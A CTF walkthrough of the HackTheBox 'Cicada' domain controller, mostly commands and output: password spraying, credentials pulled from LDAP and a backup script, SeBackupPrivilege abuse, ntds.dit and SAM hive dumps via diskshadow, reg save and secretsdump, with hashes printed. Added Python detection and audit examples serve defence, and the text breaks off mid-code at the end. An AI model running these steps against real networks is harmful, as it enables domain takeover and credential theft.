Here are my notes on the CICADA box from HackTheBox.
CICADA: 10.129.96.74
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-10-24 21:17:35Z)
sudo impacket-GetUserSPNs 'cicada.htb/michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8' -dc-ip 10.129.96.74 -request
Impacket v0.9.24.dev1+20210704.162046.29ad5792 - Copyright 2021 SecureAuth Corporation
No entries found!
#NOPE: no SPNs on user accounts, so nothing to Kerberoast.
sudo GetNPUsers.py -no-pass -dc-ip 10.129.96.74 -usersfile users.txt cicada.htb/
/usr/local/bin/GetNPUsers.py:4: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
__import__('pkg_resources').run_script('impacket==0.9.24.dev1+20210704.162046.29ad5792', 'GetNPUsers.py')
Impacket v0.9.24.dev1+20210704.162046.29ad5792 - Copyright 2021 SecureAuth Corporation
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Guest doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User CICADA-DC$ doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User john.smoulder doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User sarah.dantelia doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User michael.wrightson doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User david.orelious doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User emily.oscars doesn't have UF_DONT_REQUIRE_PREAUTH set
No AS-REP roasting (nobody has UF_DONT_REQUIRE_PREAUTH set) - NOPE!
135/tcp open msrpc Microsoft Windows RPC
rpcclient --user="" -N 10.129.96.74
rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIED
rpcclient $> srvinfo
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
rpcclient $>
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
ldapsearch -x -H ldap://10.129.96.74 -D '' -w '' -b "DC=cicada,DC=htb" "objectclass=user"
# extended LDIF
#
# LDAPv3
# base <DC=cicada,DC=htb> with scope subtree
# filter: objectclass=user
# requesting: ALL
#
# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090C78, comment: In order to perform this opera
tion a successful bind must be completed on the connection., data 0, v4f7c
# numResponses: 1
#Anonymous LDAP bind = NOPE.
#Unless creds are acquired, don't bother.
ldapsearch -H ldap://10.129.96.74 -x -W -D "michael.wrightson@cicada.htb" -b "dc=cicada,dc=htb" '(objectClass=person)'
[SNIP]
# David Orelious, Users, cicada.htb
dn: CN=David Orelious,CN=Users,DC=cicada,DC=htb
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: David Orelious
sn: Orelious
description: Just in case I forget my password is aRt$Lp#7t*VQ!3
givenName: David
initials: D
distinguishedName: CN=David Orelious,CN=Users,DC=cicada,DC=htb
instanceType: 4
whenCreated: 20240314121729.0Z
whenChanged: 20240828172557.0Z
[SNIP]
crackmapexec smb 10.129.96.74 -u david.orelious -p 'aRt$Lp#7t*VQ!3'
SMB 10.129.96.74 445 CICADA-DC [*] Windows 10.0 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.129.96.74 445 CICADA-DC [+] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3
#david.orelious credential discovered !
cicada.htb\david.orelious:aRt$Lp#7t*VQ!3
445/tcp open microsoft-ds?
smbclient -N -L 10.129.96.74
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
DEV Disk
HR Disk
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing
┌──(root㉿kali)-[/home/kali/BOXES/CICADA/10.129.96.74]
└─# crackmapexec smb 10.129.96.74 -u "guest" -p "" --shares
SMB 10.129.96.74 445 CICADA-DC [*] Windows 10.0 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.129.96.74 445 CICADA-DC [+] cicada.htb\guest:
SMB 10.129.96.74 445 CICADA-DC [+] Enumerated shares
SMB 10.129.96.74 445 CICADA-DC Share Permissions Remark
SMB 10.129.96.74 445 CICADA-DC ----- ----------- ------
SMB 10.129.96.74 445 CICADA-DC ADMIN$ Remote Admin
SMB 10.129.96.74 445 CICADA-DC C$ Default share
SMB 10.129.96.74 445 CICADA-DC DEV
SMB 10.129.96.74 445 CICADA-DC HR READ
SMB 10.129.96.74 445 CICADA-DC IPC$ READ Remote IPC
SMB 10.129.96.74 445 CICADA-DC NETLOGON Logon server share
SMB 10.129.96.74 445 CICADA-DC SYSVOL Logon server share
sudo lookupsid.py Guest@10.129.96.74 | tee usernames
grep SidTypeUser usernames | awk '{print $2}' | cut -d "\\" -f2 > users.txt
┌──(root㉿kali)-[/home/kali/BOXES/CICADA/10.129.96.74]
└─# ls
nmap nmapAutomator_10.129.96.74_All.txt recon usernames users.txt
┌──(root㉿kali)-[/home/kali/BOXES/CICADA/10.129.96.74]
└─# cat users.txt
Administrator
Guest
krbtgt
CICADA-DC$
john.smoulder
sarah.dantelia
michael.wrightson
david.orelious
emily.oscars
┌──(root㉿kali)-[/home/kali/BOXES/CICADA/10.129.96.74]
└─# smbclient \\\\10.129.96.74\\"HR" -U 'Guest%'
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Thu Mar 14 08:29:09 2024
.. D 0 Thu Mar 14 08:21:29 2024
Notice from HR.txt A 1266 Wed Aug 28 13:31:48 2024
4168447 blocks of size 4096. 438743 blocks available
smb: \> get "Notice from HR.txt"
getting file \Notice from HR.txt of size 1266 as Notice from HR.txt (0.6 KiloBytes/sec) (average 0.6 KiloBytes/sec)
smb: \> exit
┌──(root㉿kali)-[/home/kali/BOXES/CICADA/10.129.96.74]
└─# cat 'Notice from HR.txt'
Dear new hire!
Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.
Your default password is: Cicada$M6Corpb*@Lp#nZp!8
To change your password:
1. Log in to your Cicada Corp account** using the provided username and the default password mentioned above.
2. Once logged in, navigate to your account settings or profile settings section.
3. Look for the option to change your password. This will be labeled as "Change Password".
4. Follow the prompts to create a new password**. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.
5. After changing your password, make sure to save your changes.
Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.
If you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at support@cicada.htb.
Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!
Best regards,
Cicada Corp
-Take that default password and spray it against every user in users.txt.
crackmapexec smb 10.129.96.74 -u users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8'
SMB 10.129.96.74 445 CICADA-DC [*] Windows 10.0 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.129.96.74 445 CICADA-DC [-] cicada.htb\Administrator:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.129.96.74 445 CICADA-DC [-] cicada.htb\Guest:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.129.96.74 445 CICADA-DC [-] cicada.htb\krbtgt:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.129.96.74 445 CICADA-DC [-] cicada.htb\CICADA-DC$:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.129.96.74 445 CICADA-DC [-] cicada.htb\john.smoulder:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.129.96.74 445 CICADA-DC [-] cicada.htb\sarah.dantelia:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.129.96.74 445 CICADA-DC [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8 #GOT IT !
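From the defender's side, the spray above is exactly the pattern a DC's Security log shows: one source, one attempt per account, many distinct accounts, then a single success. The following is an added example (my code, not part of the original notes) that runs that check over constructed Event 4625/4624-style log lines; the log layout, timestamps and source IPs (documentation range 192.0.2.0/24) are assumptions, the account names are the ones from users.txt.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed log lines (not from the box), modelled on the spray above:
# "<timestamp> <event_id> <account> <source_ip> <status>". 4625 = failed logon,
# 4624 = successful logon. 192.0.2.10 tries one password against every account in
# users.txt and finally lands one; 192.0.2.20 hammers a single account instead.
SAMPLE_LOG = """\
2024-10-24T21:20:01Z 4625 cicada.htb\\Administrator 192.0.2.10 0xC000006D
2024-10-24T21:20:01Z 4625 cicada.htb\\Guest 192.0.2.10 0xC000006D
2024-10-24T21:20:02Z 4625 cicada.htb\\krbtgt 192.0.2.10 0xC000006D
2024-10-24T21:20:02Z 4625 cicada.htb\\CICADA-DC$ 192.0.2.10 0xC000006D
2024-10-24T21:20:03Z 4625 cicada.htb\\john.smoulder 192.0.2.10 0xC000006D
2024-10-24T21:20:03Z 4625 cicada.htb\\sarah.dantelia 192.0.2.10 0xC000006D
2024-10-24T21:20:04Z 4624 cicada.htb\\michael.wrightson 192.0.2.10 0x0
2024-10-24T21:45:00Z 4625 cicada.htb\\john.smoulder 192.0.2.20 0xC000006D
2024-10-24T21:46:00Z 4625 cicada.htb\\john.smoulder 192.0.2.20 0xC000006D
"""


def parse_line(line):
    """Split one constructed log line into its fields."""
    ts, event_id, account, src, status = line.split()
    return {
        "ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
        "event_id": int(event_id),
        "account": account,
        "src": src,
        "status": status,
    }


def detect_spray(log_text, window_minutes=5, min_accounts=5):
    """Flag a source that fails logons for >= min_accounts distinct accounts inside
    the window, and list every account that logged on successfully from that source
    in the same window (the spray that landed). One account failing over and over is
    a brute force, not a spray, and is deliberately not reported here."""
    window = timedelta(minutes=window_minutes)
    events = sorted(
        (parse_line(l) for l in log_text.splitlines() if l.strip()),
        key=lambda e: e["ts"],
    )
    by_src = defaultdict(list)
    for e in events:
        by_src[e["src"]].append(e)

    alerts = []
    for src, evs in by_src.items():
        failures = [e for e in evs if e["event_id"] == 4625]
        for i, start in enumerate(failures):
            end = start["ts"] + window
            tried = {e["account"] for e in failures[i:] if e["ts"] <= end}
            if len(tried) < min_accounts:
                continue
            landed = sorted(
                {e["account"] for e in evs
                 if e["event_id"] == 4624 and start["ts"] <= e["ts"] <= end}
            )
            alerts.append({
                "src": src,
                "first_seen": start["ts"].isoformat(),
                "accounts_tried": sorted(tried),
                "accounts_landed": landed,
            })
            break  # one alert per source is enough
    return alerts


if __name__ == "__main__":
    for alert in detect_spray(SAMPLE_LOG):
        print(alert)
```

The threshold of five distinct accounts in five minutes is a starting point, not a standard; the thing that makes this rule cheap to run and hard to evade is that it keys on distinct accounts per source rather than on failure counts, which a slow spray keeps low.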
crackmapexec smb 10.129.96.74 -u michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8' --shares
SMB 10.129.96.74 445 CICADA-DC [*] Windows 10.0 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.129.96.74 445 CICADA-DC [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
SMB 10.129.96.74 445 CICADA-DC [+] Enumerated shares
SMB 10.129.96.74 445 CICADA-DC Share Permissions Remark
SMB 10.129.96.74 445 CICADA-DC ----- ----------- ------
SMB 10.129.96.74 445 CICADA-DC ADMIN$ Remote Admin
SMB 10.129.96.74 445 CICADA-DC C$ Default share
SMB 10.129.96.74 445 CICADA-DC DEV
SMB 10.129.96.74 445 CICADA-DC HR READ
SMB 10.129.96.74 445 CICADA-DC IPC$ READ Remote IPC
SMB 10.129.96.74 445 CICADA-DC NETLOGON READ Logon server share
SMB 10.129.96.74 445 CICADA-DC SYSVOL READ Logon server share
#NOPE, DON'T BOTHER, THAT IS A RABBIT HOLE !
#FROM LDAP Enumeration:
crackmapexec smb 10.129.96.74 -u david.orelious -p 'aRt$Lp#7t*VQ!3' --shares
SMB 10.129.96.74 445 CICADA-DC [*] Windows 10.0 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.129.96.74 445 CICADA-DC [+] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3
SMB 10.129.96.74 445 CICADA-DC [+] Enumerated shares
SMB 10.129.96.74 445 CICADA-DC Share Permissions Remark
SMB 10.129.96.74 445 CICADA-DC ----- ----------- ------
SMB 10.129.96.74 445 CICADA-DC ADMIN$ Remote Admin
SMB 10.129.96.74 445 CICADA-DC C$ Default share
SMB 10.129.96.74 445 CICADA-DC DEV READ
SMB 10.129.96.74 445 CICADA-DC HR READ
SMB 10.129.96.74 445 CICADA-DC IPC$ READ Remote IPC
SMB 10.129.96.74 445 CICADA-DC NETLOGON READ Logon server share
SMB 10.129.96.74 445 CICADA-DC SYSVOL READ Logon server share
┌──(root㉿kali)-[/home/kali/BOXES/CICADA/10.129.96.74]
└─# cd DEV
┌──(root㉿kali)-[/home/…/BOXES/CICADA/10.129.96.74/DEV]
└─# smbclient \\\\10.129.96.74\\"DEV" -U 'david.orelious%aRt$Lp#7t*VQ!3'
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Thu Mar 14 08:31:39 2024
.. D 0 Thu Mar 14 08:21:29 2024
Backup_script.ps1 A 601 Wed Aug 28 13:28:22 2024
4168447 blocks of size 4096. 435411 blocks available
smb: \> get Backup_script.ps1
getting file \Backup_script.ps1 of size 601 as Backup_script.ps1 (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)
smb: \> exit
┌──(root㉿kali)-[/home/…/BOXES/CICADA/10.129.96.74/DEV]
└─# ls
Backup_script.ps1
┌──(root㉿kali)-[/home/…/BOXES/CICADA/10.129.96.74/DEV]
└─# cat Backup_script.ps1
$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"
$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"
emily.oscars creds discovered !
emily.oscars:Q!3@Lp#M6b*7t*Vt
#According to LDAP:
[SNIP]
givenName: Emily
distinguishedName: CN=Emily Oscars,CN=Users,DC=cicada,DC=htb
instanceType: 4
whenCreated: 20240822212017.0Z
whenChanged: 20240829214805.0Z
displayName: Emily Oscars
uSNCreated: 90173
memberOf: CN=Remote Management Users,CN=Builtin,DC=cicada,DC=htb
memberOf: CN=Backup Operators,CN=Builtin,DC=cicada,DC=htb
uSNChanged: 135233
name: Emily Oscars
objectGUID:: R6f9/+eATEWMN2cCOkXyUg==
userAccountControl: 66048
[SNIP]
emily.oscars is in Remote Management Users, so WinRM is open to her = USER-SHELL !
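Everything that moved this box forward came out of the directory and a share: a password in a description attribute, a plaintext password baked into Backup_script.ps1, and a user sitting in Backup Operators. Those are findings an AD audit script should raise before an attacker does. Below is an added example (mine, not the notes' own code) that parses ldapsearch-style LDIF, including folded continuation lines and base64 (`attr::`) values, and flags credential-looking descriptions, risky userAccountControl bits (among them DONT_REQUIRE_PREAUTH, the flag GetNPUsers checked for above) and membership in privileged built-in groups; it also scans a PowerShell script for the `ConvertTo-SecureString "..." -AsPlainText` pattern. The David and Emily attributes are the ones shown on this page; the `svc.example` entry and its description are constructed so the pre-auth check has something to fire on.

```python
import base64
import re

# Constructed LDIF modelled on the ldapsearch output above. David's description and
# Emily's memberOf/userAccountControl are from the page; "svc.example" is a
# constructed entry with DONT_REQUIRE_PREAUTH set (the box has no such account).
LDIF_SAMPLE = """\
dn: CN=David Orelious,CN=Users,DC=cicada,DC=htb
description: Just in case I forget my
  password is aRt$Lp#7t*VQ!3

dn: CN=Emily Oscars,CN=Users,DC=cicada,DC=htb
memberOf: CN=Remote Management Users,CN=Builtin,DC=cicada,DC=htb
memberOf: CN=Backup Operators,CN=Builtin,DC=cicada,DC=htb
userAccountControl: 66048

dn: CN=svc.example,CN=Users,DC=cicada,DC=htb
description:: U2VydmljZSBhY2NvdW50
userAccountControl: 4260352
"""
# The three credential lines of Backup_script.ps1 as shown above.
PS_SAMPLE = """\
$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
"""

# userAccountControl bits (ADS_USER_FLAG_ENUM), restricted to the ones an audit cares about.
UAC_FLAGS = {0x0002: "ACCOUNTDISABLE", 0x0020: "PASSWD_NOTREQD", 0x0200: "NORMAL_ACCOUNT",
             0x10000: "DONT_EXPIRE_PASSWORD", 0x80000: "TRUSTED_FOR_DELEGATION",
             0x200000: "USE_DES_KEY_ONLY", 0x400000: "DONT_REQUIRE_PREAUTH"}
RISKY_UAC = {"PASSWD_NOTREQD", "DONT_EXPIRE_PASSWORD", "TRUSTED_FOR_DELEGATION",
             "USE_DES_KEY_ONLY", "DONT_REQUIRE_PREAUTH"}
PRIVILEGED_GROUPS = {"Administrators", "Domain Admins", "Enterprise Admins",
                     "Backup Operators", "Account Operators", "Server Operators"}
SECRET_HINT = re.compile(r"\b(pass(word|wd|phrase)?|pwd|secret|credential)s?\b", re.I)
PLAINTEXT_CRED = re.compile(
    r'ConvertTo-SecureString\s+"[^"]+"\s+-AsPlainText|\$pass(word|wd)?\s*=\s*"[^"]+"', re.I)


def parse_ldif(text):
    """Parse LDIF into a list of {attribute: [values]} dicts. Handles the two things
    ldapsearch output does that a naive split-on-colon misses: folded continuation
    lines (leading space) and base64 values written as 'attr:: value'."""
    unfolded = []
    for raw in text.splitlines():
        if raw.startswith(" ") and unfolded:
            unfolded[-1] += raw[1:]
        else:
            unfolded.append(raw)
    records, current = [], {}
    for line in unfolded + [""]:          # trailing "" flushes the last record
        if not line.strip():
            if current:
                records.append(current)
            current = {}
        elif not line.startswith("#"):
            attr, _, value = line.partition(":")
            if value.startswith(":"):
                value = base64.b64decode(value[1:].strip()).decode("utf-8", "replace")
            current.setdefault(attr, []).append(value.strip())
    return records


def decode_uac(value):
    """Names of the known flags set in a userAccountControl integer, low bit first."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]


def audit_entries(records):
    """(dn, finding) pairs for credential-like free-text attributes, risky UAC flags
    and membership in privileged built-in groups. Entries may lack any attribute."""
    findings = []
    for rec in records:
        dn = rec.get("dn", ["?"])[0]
        for attr in ("description", "info", "comment"):
            if any(SECRET_HINT.search(v) for v in rec.get(attr, [])):
                findings.append((dn, f"{attr} looks like it contains a credential"))
        for raw in rec.get("userAccountControl", []):
            for flag in decode_uac(int(raw)):
                if flag in RISKY_UAC:
                    findings.append((dn, f"userAccountControl has {flag}"))
        for group in rec.get("memberOf", []):
            cn = group.split(",", 1)[0].split("=", 1)[-1]
            if cn in PRIVILEGED_GROUPS:
                findings.append((dn, f"member of privileged group {cn}"))
    return findings


def scan_script(text):
    """1-based line numbers of a PowerShell script that embed a plaintext password."""
    return [n for n, line in enumerate(text.splitlines(), 1) if PLAINTEXT_CRED.search(line)]


if __name__ == "__main__":
    for dn, finding in audit_entries(parse_ldif(LDIF_SAMPLE)):
        print(f"{dn}: {finding}")
    print("plaintext credential on script lines:", scan_script(PS_SAMPLE))
```

The audit deliberately reports that a description "looks like" a credential instead of echoing the value, so the report itself does not become another place the password is written down. Emily's 66048 decodes to NORMAL_ACCOUNT plus DONT_EXPIRE_PASSWORD, which is why she shows up once for the flag and once for Backup Operators.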
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
crackmapexec winrm 10.129.96.74 -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt'
SMB 10.129.96.74 5985 CICADA-DC [*] Windows 10.0 Build 20348 (name:CICADA-DC) (domain:cicada.htb)
HTTP 10.129.96.74 5985 CICADA-DC [*] http://10.129.96.74:5985/wsman
WINRM 10.129.96.74 5985 CICADA-DC [+] cicada.htb\emily.oscars:Q!3@Lp#M6b*7t*Vt (Pwn3d!)
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> whoami
cicada\emily.oscars
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> hostname
CICADA-DC
USER-SHELL !
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> dir
Directory: C:\Users\emily.oscars.CICADA\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 10/24/2024 2:14 PM 34 user.txt
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> type user.txt
[REDACTED]
USER.TXT: [REDACTED]
PRIV ESC:
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> whoami /groups
Local Group Memberships *Backup Operators *Remote Management Users
Global Group memberships *Domain Users
The command completed successfully.
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
┌──(root㉿kali)-[/home/…/BOXES/CICADA/10.129.96.74/Backup-PRIV]
└─# ls
script.txt SeBackupPrivilegeCmdLets.dll SeBackupPrivilegeUtils.dll
┌──(root㉿kali)-[/home/…/BOXES/CICADA/10.129.96.74/Backup-PRIV]
└─# cat script.txt
set verbose on
set metadata C:\Windows\Temp\meta.cab
set context clientaccessible
set context persistent
begin backup
add volume C: alias cdrive
create
expose %cdrive% E:
end backup
┌──(root㉿kali)-[/home/…/BOXES/CICADA/10.129.96.74/Backup-PRIV]
└─# unix2dos script.txt
unix2dos: converting file script.txt to DOS format...
┌──(root㉿kali)-[/home/…/BOXES/CICADA/10.129.96.74/Backup-PRIV]
└─# evil-winrm -i 10.129.96.74 -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> upload script.txt
upload SeBackupPrivilegeUtils.dll
upload SeBackupPrivilegeCmdLets.dll
Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll
diskshadow /s script.txt
Copy-FileSebackupPrivilege e:\Windows\NTDS\ntds.dit C:\Users\emily.oscars.CICADA\Documents\ntds.dit
reg save hklm\sam C:\Users\emily.oscars.CICADA\Documents\sam
reg save hklm\system C:\Users\emily.oscars.CICADA\Documents\system
download ntds.dit
download system
impacket-secretsdump -ntds ntds.dit -system system local
impacket-secretsdump -sam sam -system system -ntds ntds.dit LOCAL #Also passes the SAM hive, so the local accounts come out alongside the domain ones in case the domain Administrator hash alone doesn't work.
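What the chain above looks like to a detection engineer: a non-admin Backup Operator runs diskshadow with a script file, then exports the SAM and SYSTEM hives with reg save. The added example below (mine, not from these notes) matches those two behaviours in constructed Sysmon event 1 / Security 4688-style process-creation records and raises one high-severity alert when the same user does both within ten minutes. The event layout, timestamps and the benign john.smoulder record are assumptions; the three command lines are the ones typed above.

```python
import re
from datetime import datetime, timedelta

# Constructed process-creation events (Sysmon event 1 / Security 4688 shape), not
# taken from the box. The first three mirror the commands run above; the fourth is a
# benign reg.exe query that must not fire.
EVENTS = [
    {"ts": "2024-10-24T22:01:10Z", "user": "CICADA\\emily.oscars",
     "cmd": "diskshadow /s script.txt"},
    {"ts": "2024-10-24T22:01:40Z", "user": "CICADA\\emily.oscars",
     "cmd": "reg save hklm\\sam C:\\Users\\emily.oscars.CICADA\\Documents\\sam"},
    {"ts": "2024-10-24T22:01:41Z", "user": "CICADA\\emily.oscars",
     "cmd": "reg save hklm\\system C:\\Users\\emily.oscars.CICADA\\Documents\\system"},
    {"ts": "2024-10-24T09:00:00Z", "user": "CICADA\\john.smoulder",
     "cmd": "reg query HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion"},
]

RULES = {
    "diskshadow_scripted": re.compile(r"\bdiskshadow(\.exe)?\s+/s\b", re.I),
    "reg_save_hive": re.compile(r"\breg(\.exe)?\s+save\s+hklm\\(sam|system|security)\b", re.I),
}
# Both behaviours from one user inside the window = credential store export.
CHAIN = {"diskshadow_scripted", "reg_save_hive"}


def match_events(events):
    """(timestamp, user, rule) for every event whose command line hits a rule."""
    hits = []
    for ev in events:
        for name, pattern in RULES.items():
            if pattern.search(ev["cmd"]):
                ts = datetime.strptime(ev["ts"], "%Y-%m-%dT%H:%M:%SZ")
                hits.append((ts, ev["user"], name))
    return sorted(hits)


def correlate(events, window_minutes=10):
    """One high-severity alert per user whose rule hits cover the whole CHAIN
    within the window; a lone diskshadow or a lone reg save stays a plain hit."""
    window = timedelta(minutes=window_minutes)
    hits = match_events(events)
    alerts = []
    for user in sorted({u for _, u, _ in hits}):
        mine = [(ts, rule) for ts, u, rule in hits if u == user]
        for i, (start, _) in enumerate(mine):
            seen = {rule for ts, rule in mine[i:] if ts - start <= window}
            if CHAIN <= seen:
                alerts.append({"user": user, "first_seen": start.isoformat(),
                               "severity": "high", "rules": sorted(seen)})
                break
    return alerts


if __name__ == "__main__":
    for hit in match_events(EVENTS):
        print("hit:", hit)
    for alert in correlate(EVENTS):
        print("alert:", alert)
```

Either rule on its own is noisy on a real estate (backup software legitimately drives diskshadow, admins legitimately save hives), which is why the alert only fires on the pair from one account, and why the account's group membership from the LDAP audit is the first thing to join against when it does.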
secretsdump.py -ntds ntds.dit -system system local
/usr/local/bin/secretsdump.py:4: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
__import__('pkg_resources').run_script('impacket==0.9.24.dev1+20210704.162046.29ad5792', 'secretsdump.py')
Impacket v0.9.24.dev1+20210704.162046.29ad5792 - Copyright 2021 SecureAuth Corporation
[*] Target system bootKey: 0x3c2b033757a49110a9ee680b46e8d620
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: f954f575c626d6afe06c2b80cc2185e6
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
CICADA-DC$:1000:aad3b435b51404eeaad3b435b51404ee:188c2f3cb7592e18d1eae37991dee696:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:3779000802a4bb402736bee52963f8ef:::
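Once a password audit produces output in the secretsdump format above, the defender's question is which accounts are weak: empty passwords, LM hashes still stored, and one password shared by several accounts. The following is an added example (mine, not the notes' own code) that parses that `user:rid:lmhash:nthash:::` format, skipping the `[*]` status lines and tolerating a `domain\user` prefix, and reports those three conditions. Input is the four lines printed above plus two constructed accounts (suffix `.constructed`, hashes made up) that share an NT hash and still carry an LM hash; the two constant hashes are the ones visible in the Guest line above.

```python
import re
from collections import defaultdict

# The four lines secretsdump printed above, plus two constructed accounts (suffix
# ".constructed", hashes made up) that share an NT hash and still store an LM hash.
SAMPLE_DUMP = """\
[*] Reading and decrypting hashes from ntds.dit
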